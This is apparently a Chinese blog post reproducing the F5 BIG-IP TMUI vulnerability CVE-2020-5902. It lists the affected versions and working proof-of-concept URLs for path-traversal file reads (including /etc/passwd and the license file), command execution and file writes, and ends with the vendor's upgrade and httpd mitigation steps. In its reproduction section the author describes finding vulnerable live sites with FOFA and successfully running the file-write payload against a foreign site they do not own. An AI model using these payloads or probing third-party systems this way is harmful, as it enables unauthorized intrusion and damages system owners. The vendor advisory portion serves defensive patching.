CVE-2020-5902简单复现
这⼏天通报了f5的⼀个漏洞,想着先弄个环境保存着,说不定后⾯就⽤到了。。
1、漏洞描述
近⽇,F5官⽅发布公告,修复了流量管理⽤户界⾯(TMUI)中存在的⼀个远程代码执⾏漏洞(CVE-2020-5902)。此漏洞允许未经⾝份验证的攻击者或经过⾝份验证的⽤户通过BIG-IP管理端⼝和/或⾃⾝IP对TMUI进⾏⽹络访问,以执⾏任意系统命令、创建或删除⽂件、禁⽤服务和/或执⾏任意Java代码。该漏洞可能对整个系统造成危害。⽬前监测到⽹络上已经有PoC,并且已有利⽤该漏洞的攻击⾏为出现,建议⽤户尽快升级进⾏防护。
F5 BIG-IP 是美国 F5 公司的⼀款集成了⽹络流量管理、应⽤程序安全管理、负载均衡等功能的应⽤交付平台。
2、受影响的版本
F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0
F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2
F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3
F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5
F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5
spring framework rce漏洞复现3、漏洞POC
⽹上流传的⼏条(本⼩⽩只会”捡现成“的QAQ):
⽂件读取:
<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/f
RCE:
[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
写⼊⽂件:
IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456
4、复现
因为才公布出来⼏天,所以⽹上还可以搜到许多漏洞版本的⽹站(其实感觉⼤多数site后⾯也不会修补。),这⾥尝试搜了⼀下,发现还挺多,直接⽤国外的站点尝试⼀下(毕竟⾃⼰搭环境还是挺⿇烦的,但不知道搜到的具有漏洞的⽹站是不是蜜罐。。。)
⽤fofa搜⼀下漏洞版本:
到⼀个漂亮国的能正常访问。测试⼀下下,发现能成功。
写⼊⽂件:
这⾥尝试RCE列出⽤户,没有输出
⾃⼰搭个环境试试,版本为14.1.2,因为现在官⽹好像已经下不到漏洞版本了,⽹上随便了个别⼈下载的,但发现web页⾯的账号密码好像被他改了(默认是admin/admin),不过不影响,也可以直接利⽤:
尝试下msf,这⾥我刚开始使⽤的离线下载该模块,然后⼿动添加到msf,但发现始终载⼊不了该模块,最后也没解决(应该是我的msf版本太低了,识别不到新模块),这⾥其实新版本msf⾥就有该exp,不⽤⼿动添加,更新msf即可(这⾥遇到⼀个更新后msf⽆法启动的问题,后⾯解决了,之后再总结⼀下吧)
这⾥没有成功。。后⾯再尝试下(⽹上的⽂章全都⼀样,只写到了有这个模块,没有⼈说成功⽤exp拿到了shell。)
5、官⽅修复建议
通⽤修补建议:
升级到以下版本
BIG-IP 15.x: 15.1.0.4
BIG-IP 14.x: 14.1.2.6
BIG-IP 13.x: 13.1.3.4
BIG-IP 12.x: 12.1.5.2
BIG-IP 11.x: 11.6.5.2
临时修补建议:
官⽅建议可以通过以下步骤临时缓解影响1) 使⽤以下命令登录对应系统
tmsh
2) 编辑 httpd 组件的配置⽂件
edit /sys httpd all-properties
3) ⽂件内容如下
include '
<LocationMatch "...;.">
Redirect 404 /
</LocationMatch>
'
4) 按照如下操作保存⽂件
按下 ESC 并依次输⼊
:wq
5) 执⾏命令刷新配置⽂件
save /sys config
6) 重启 httpd 服务
restart sys service httpd
并禁⽌外部IP对 TMUI 页⾯的访问

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。